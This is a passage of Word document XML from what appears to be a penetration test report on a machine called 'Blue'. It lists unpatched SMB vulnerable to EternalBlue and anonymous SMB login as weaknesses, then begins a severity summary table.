    <w:p w14:paraId="0EA1B6B3" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="00BD2591" w:rsidP="008A3E5E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="138"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>identifies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>strengths</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>identified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>during</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>assessment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33669EE1" w14:textId="4FAC6A49" w:rsidR="00A2140D" w:rsidRPr="005B7E48" w:rsidRDefault="001A48B5" w:rsidP="008A3E5E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="138"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>SMB Files Shares do not have any sensitive information being stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F317E7A" w14:textId="6F60C550" w:rsidR="001A48B5" w:rsidRDefault="001A48B5" w:rsidP="008A3E5E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5391304F" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="00BD2591" w:rsidP="008A3E5E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="138"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD2591">
        <w:t>The following identifies the key weaknesses identified during the assessment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA50C0A" w14:textId="3D9B64A8" w:rsidR="009B1053" w:rsidRDefault="00322D1E" w:rsidP="008A3E5E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="138"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Unpatch</w:t>
      </w:r>
      <w:r w:rsidR="009B1053">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SMB</w:t>
      </w:r>
      <w:r w:rsidR="009B1053">
        <w:t xml:space="preserve"> becoming vulnerable to a known Eternal Blue exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3EA1C0" w14:textId="7B73A20B" w:rsidR="005B7E48" w:rsidRPr="00A2140D" w:rsidRDefault="006528B5" w:rsidP="008A3E5E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Anonymous login is allowed to SMB shares</w:t>
      </w:r>
      <w:r w:rsidR="00322D1E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBD9A40" w14:textId="77777777" w:rsidR="009C36F8" w:rsidRDefault="009C36F8" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B431FA" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C1C16CE" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F72FEB7" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="609CA188" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02DEADC2" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6835F0C6" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03DA7392" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C8EBFD" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E89FFE9" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BDEB429" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB90A14" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7738490F" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51907E51" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61BBFEAD" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4503539D" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70CFF3CB" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DD17C23" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664B2D41" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36B0A21E" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="367C749D" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3208B7B9" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="269AF1C7" w14:textId="77777777" w:rsidR="00EA741E" w:rsidRDefault="00EA741E" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1298F67E" w14:textId="59805645" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="008A3E5E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc169647983"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability Summary &amp; Report Card</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="3A462700" w14:textId="235C6894" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="008A3E5E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="273"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>illustrate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>impact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>recommended</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>remediations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393B38A9" w14:textId="77777777" w:rsidR="00EA741E" w:rsidRPr="00EA741E" w:rsidRDefault="00EA741E" w:rsidP="008A3E5E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="273"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15B24CCA" w14:textId="209156F8" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="008A3E5E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc169647984"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Internal Penetration Test Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="56896659" w14:textId="70283739" w:rsidR="00BD2591" w:rsidRDefault="008068F7" w:rsidP="008A3E5E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004833BA">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">During the course of testing, I have uncovered </w:t>
      </w:r>
      <w:r w:rsidR="00EA741E">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>one</w:t>
      </w:r>
      <w:r w:rsidRPr="004833BA">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1) finding that pose a material risk to</w:t>
      </w:r>
      <w:r w:rsidR="00B46F5A" w:rsidRPr="004833BA">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B46056" w:rsidRPr="004833BA">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Blue</w:t>
      </w:r>
      <w:r w:rsidRPr="004833BA">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B46056" w:rsidRPr="004833BA">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>machine</w:t>
      </w:r>
      <w:r w:rsidRPr="004833BA">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. The below table provides a summary of the findings by severity level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC348BB" w14:textId="77777777" w:rsidR="004833BA" w:rsidRPr="004833BA" w:rsidRDefault="004833BA" w:rsidP="004833BA">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B4EAE89" w14:textId="425A4747" w:rsidR="006F587C" w:rsidRPr="006F587C" w:rsidRDefault="006F587C" w:rsidP="006F587C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F587C">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidRPr="006F587C">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="006F587C">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="006F587C">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006E2051">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:noProof/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="006F587C">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="006F587C">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">. Severity </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>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5"/>
        <w:gridCol w:w="2014"/>
        <w:gridCol w:w="2015"/>
        <w:gridCol w:w="2015"/>
        <w:gridCol w:w="2014"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD2591" w14:paraId="7A38A1ED" w14:textId="77777777" w:rsidTr="00BD2591">
        <w:trPr>
          <w:trHeight w:val="1141"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2015" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="6A2EF5E6" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="269C7889" w14:textId="703252F8" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="509" w:right="492"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2014" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="5BC8DC89" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="43C15986" w14:textId="7D1E0743" w:rsidR="00BD2591" w:rsidRDefault="00EA53E1" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="14"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA53E1">
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2015" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p w14:paraId="6B9436C7" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="30066CFA" w14:textId="5E265390" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="14"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2015" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00AE50"/>
          </w:tcPr>
          <w:p w14:paraId="018F6FE4" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="76C432B9" w14:textId="7F60B105" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="12"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2014" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="006EC0"/>
          </w:tcPr>
          <w:p w14:paraId="5FDAEC8D" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6CB1C0A6" w14:textId="3B741ABB" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="10"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD2591" w14:paraId="5348D4ED" w14:textId="77777777" w:rsidTr="00F843E8">
        <w:trPr>
          <w:trHeight w:val="390"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2015" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="69A90A97" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="509" w:right="493"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2014" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="150828B0" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="323" w:right="309"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2015" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="750D95A4" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="509" w:right="493"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
